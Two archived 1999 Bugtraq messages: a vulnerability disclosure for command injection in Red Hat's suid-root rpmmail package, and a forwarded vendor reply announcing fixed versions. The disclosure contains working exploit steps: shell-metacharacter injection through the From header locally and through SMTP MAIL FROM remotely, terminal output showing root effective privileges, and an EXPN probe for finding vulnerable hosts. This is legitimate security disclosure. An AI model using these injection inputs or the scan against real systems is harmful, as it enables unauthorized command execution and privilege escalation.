4367218 1999-10-05  22:34  /107 rader/ Postmaster
Mottagare: Bugtraq (import) <8071>
Ärende: RH6.0 local/remote command execution
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Message-ID:  <19991005060406.4578.qmail@nwcst277.netaddress.usa.net>
Date:         Tue, 5 Oct 1999 00:04:06 MDT
Reply-To: Brock Tellier <btellier@USA.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Brock Tellier <btellier@USA.NET>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id WAA13537

Greetings,

A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
Extra Applications CD.  The potential compromise for this bug could be remote
or local root or simply remote command execution as "nobody" or similar, 
depending on your system configuration.

By sending a carefully crafted mail message to rpmmail@vulnerablehost, you can
 get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward remotely)
 to system(3) any command you wish. The command executed does not  necessarily
have root privs because of bash's handling of euid != uid of  caller. Although
system(3) calls /bin/sh -c, it is linked by default (can  anyone verify
these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2.  From the 
system(3) man page:

       system() will not, in fact, work properly from  programs  
       with suid or sgid privileges on systems on which
       /bin/sh is bash version 2, since bash 2  drops  privileges
       on  startup.   (Debian uses a modified bash which does not
       do this when invoked as sh.)
  
Thus some systems with rpmmail installed are vulnerable to local/remote root, 
all others to remote command execution as an unpriv'd user.

The local exploit as follows:

/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
bash-2.03$ ls -la /bin/sh
lrwxrwxrwx   1 root     root            9 Oct  5 11:27 /bin/sh -> /bin/bash
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: command not found
uid=100(xnec) gid=100(users) groups=100(users)
Could not open acknowledge file!
bash-2.03$

----

After linking /bin/sh to /bin/ksh instead:

bash-2.03$ ls -la /bin/sh
lrwxrwxrwx   1 root     root            8 Oct  5 11:09 /bin/sh -> /bin/ksh
bash-2.03$ cat /etc/SuSE-release;uname -a;id
SuSE Linux 6.2 (i386)
VERSION = 6.2
Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users)
bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
Could not open config file!
sh: Y: not found
uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
Could not open acknowledge file!
bash-2.03$



The remote exploit is merely:
bash-2.03$ telnet localhost 25
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
(CDT)
MAIL FROM: ;/command/to/execute;
250 <;/command/to/execute;> ... Sender Okay
RCPT TO: rpmmail
250 <rpmmail> ... Recipient Okay
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit

A remote scan of vulnerable hosts for this problem would be simple as well, 
since EXPN can be used to verify the existence of the .forward file:

220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:38:44 -0500
(CDT)
EXPN rpmmail
250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"

Brock Tellier
UNIX Systems Administrator


____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=1
(4367218) -----------------------------------
4370924 1999-10-06  22:42  /158 rader/ Postmaster
Mottagare: Bugtraq (import) <8097>
Ärende: Fwd: [Re: RH6.0 local/remote command execution]
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/mixed 
             boundary="----NetAddressPart-00--=_FqeQ6208S12288130fc"
Message-ID:  <19991006160444.10936.qmail@nwcst312.netaddress.usa.net>
Date:         Wed, 6 Oct 1999 10:04:42 MDT
Reply-To: Brock Tellier <btellier@USA.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Brock Tellier <btellier@USA.NET>
X-To:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM

This is a multi-part message in MIME format.

------NetAddressPart-00--=_FqeQ6208S12288130fc
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: quoted-printable



____________________________________________________________________
Get free email and a permanent address at http://www.netaddress.com/?N=3D=
1

------NetAddressPart-00--=_FqeQ6208S12288130fc
Content-Type: message/rfc822; name="Forwarded Message"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Received: from smtp7.atl.mindspring.net [207.69.128.51] by nm195 via mtad (2.6)
	with ESMTP id 831DJFoYu0173M19; Wed, 06 Oct 1999 14:50:20 GMT
Received: from brian (user-2ivf8f4.dialup.mindspring.com [165.247.161.228])
	by smtp7.atl.mindspring.net (8.8.5/8.8.5) with SMTP id KAA16515
	for <btellier@USA.NET>; Wed, 6 Oct 1999 10:50:13 -0400 (EDT)
Message-Id: <3.0.5.32.19991006105034.007c4100@pop.mindspring.com>
X-Sender: bkgold@pop.mindspring.com (Unverified)
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Wed, 06 Oct 1999 10:50:34 -0400
To: Brock Tellier <btellier@USA.NET>
From: Brian Gold <bgold@reedycreek.com>
Subject: Re: RH6.0 local/remote command execution
In-Reply-To: <3.0.5.32.19991005161929.00937100@pop.mindspring.com>
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"

Hi Brock,

Thanks for pointing out the vulnerability problem with our rpmmail package.
 We have fixed this problem and posted new versions on our FTP site. (below)

If you get a chance please put this version thru your testing process.

We are grateful to people like you who help us in our on going effort to
produce quality, bug free software.


ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4.tar.gz
  or
ftp://reedycreek.com/reedycreek/rpmmaildemo/rpmmail-1.4-2.i386.rpm




At 04:19 PM 10/5/99 -0400, you wrote:
>Greetings,
>
>A vulnerability exists in the rpmmail package distributed on the Red Hat 6.0
>Extra Applications CD.  The potential compromise for this bug could be remote
>or local root or simply remote command execution as "nobody" or similar,
>depending on your system configuration.
>
>By sending a carefully crafted mail message to rpmmail@vulnerablehost, you
can
> get /home/rpmmail/rpmmail (suid root by default, exec'd by .forward
remotely)
> to system(3) any command you wish. The command executed does not
necessarily
>have root privs because of bash's handling of euid != uid of  caller.
Although
>system(3) calls /bin/sh -c, it is linked by default (can  anyone verify
>these?) on some Linux systems, such as SuSE 6.2, to /bin/bash v2.  From the
>system(3) man page:
>
>       system() will not, in fact, work properly from  programs
>       with suid or sgid privileges on systems on which
>       /bin/sh is bash version 2, since bash 2  drops  privileges
>       on  startup.   (Debian uses a modified bash which does not
>       do this when invoked as sh.)
>
>Thus some systems with rpmmail installed are vulnerable to local/remote
root,
>all others to remote command execution as an unpriv'd user.
>
>The local exploit as follows:
>
>/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior:
>bash-2.03$ ls -la /bin/sh
>lrwxrwxrwx   1 root     root            9 Oct  5 11:27 /bin/sh -> /bin/bash
>bash-2.03$ cat /etc/SuSE-release;uname -a;id
>SuSE Linux 6.2 (i386)
>VERSION = 6.2
>Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
>uid=100(xnec) gid=100(users) groups=100(users)
>bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
>Could not open config file!
>sh: Y: command not found
>uid=100(xnec) gid=100(users) groups=100(users)
>Could not open acknowledge file!
>bash-2.03$
>
>----
>
>After linking /bin/sh to /bin/ksh instead:
>
>bash-2.03$ ls -la /bin/sh
>lrwxrwxrwx   1 root     root            8 Oct  5 11:09 /bin/sh -> /bin/ksh
>bash-2.03$ cat /etc/SuSE-release;uname -a;id
>SuSE Linux 6.2 (i386)
>VERSION = 6.2
>Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
>uid=100(xnec) gid=100(users) groups=100(users)
>bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c bah
>Could not open config file!
>sh: Y: not found
>uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100(users)
>Could not open acknowledge file!
>bash-2.03$
>
>
>
>The remote exploit is merely:
>bash-2.03$ telnet localhost 25
>Trying 127.0.0.1...
>Connected to localhost.
>Escape character is '^]'.
>220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11:31:13 -0500
>(CDT)
>MAIL FROM: ;/command/to/execute;
>250 <;/command/to/execute;> ... Sender Okay
>RCPT TO: rpmmail
>250 <rpmmail> ... Recipient Okay
>data
>354 Enter mail, end with "." on a line by itself
>
>
>

 Brian Gold
 Reedy Creek Technologies, Inc.
 Voice: (919) 934-6869 Ext. 124
 Fax: (919) 934-1537
 bgold@reedycreek.com
 http://www.reedycreek.com/


------NetAddressPart-00--=_FqeQ6208S12288130fc--
(4370924) -----------------------------------